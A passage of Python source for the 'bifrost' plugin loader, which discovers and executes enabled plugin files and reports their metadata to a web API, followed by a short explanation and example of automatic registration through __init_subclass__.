spec = importlib.util.spec_from_file_location(plugin_name, filename)
instance = importlib.util.module_from_spec(spec)
spec.loader.exec_module(instance)
return plugin_name, instance
def load_from_path(path, enabled=()):
"""Scan a directory for plugins, load enabled ones."""
global loaded, database
if not path or not os.path.isdir(path):
return loaded
logger.debug("loading plugins from %s — enabled: %s", path, enabled)
for filename in glob.glob(os.path.join(path, "*.py")):
plugin_name = os.path.basename(filename.replace(".py", ""))
database[plugin_name] = filename
if plugin_name in enabled:
try:
load_from_file(filename)
except Exception as e:
logger.warning("error loading %s: %s", filename, e)
return loaded
def load(config):
"""Load plugins from default + custom paths based on config."""
plugins_cfg = config.get('bifrost_plugins', {})
enabled = [
name for name, opts in plugins_cfg.items()
if isinstance(opts, dict) and opts.get('enabled', False)
]
# Load from default path (bifrost/plugins/)
if os.path.isdir(default_path):
load_from_path(default_path, enabled=enabled)
# Load from custom path
custom_path = config.get('bifrost_plugins_path', '')
if custom_path and os.path.isdir(custom_path):
load_from_path(custom_path, enabled=enabled)
# Propagate options
for name, plugin in loaded.items():
if name in plugins_cfg:
plugin.options = plugins_cfg[name]
on('loaded')
on('config_changed', config)
def get_loaded_info():
"""Return list of loaded plugin info dicts for web API."""
result = []
for name, plugin in loaded.items():
result.append({
'name': name,
'enabled': True,
'author': getattr(plugin, '__author__', 'unknown'),
'version': getattr(plugin, '__version__', '0.0.0'),
'description': getattr(plugin, '__description__', ''),
})
# Also include known-but-not-loaded plugins
for name, path in database.items():
if name not in loaded:
result.append({
'name': name,
'enabled': False,
'author': '',
'version': '',
'description': '',
})
return result
def shutdown():
"""Clean shutdown of plugin system."""
_executor.shutdown(wait=False)
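The plugin system registers plugins as a side effect of class definition via `__init_subclass__`: merely subclassing `Plugin` inside a loaded module adds an instance to `loaded` and creates a per-callback lock. A minimal self-contained sketch of that mechanism (the `Demo` plugin is hypothetical):

```python
import threading

loaded = {}
locks = {}

class Plugin:
    def __init__(self):
        self.options = {}

    @classmethod
    def __init_subclass__(cls, **kwargs):
        # Runs automatically whenever a subclass is defined — this is
        # the auto-registration hook used by bifrost/plugins.py.
        super().__init_subclass__(**kwargs)
        name = cls.__module__.split('.')[0]
        instance = cls()
        loaded[name] = instance
        for attr in dir(instance):
            if attr.startswith('on_') and callable(getattr(instance, attr)):
                locks['%s::%s' % (name, attr)] = threading.Lock()

class Demo(Plugin):  # hypothetical plugin, for illustration only
    def on_loaded(self):
        return 'ready'

# Defining Demo above was registration enough — no register() call.
name, instance = next(iter(loaded.items()))
print(instance.on_loaded())                            # -> ready
print(any(k.endswith('::on_loaded') for k in locks))   # -> True
```

In the real system the registry key is the plugin's filename, because `load_from_file` executes each plugin module under a module name derived from its path.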

Some files were not shown because too many files have changed in this diff.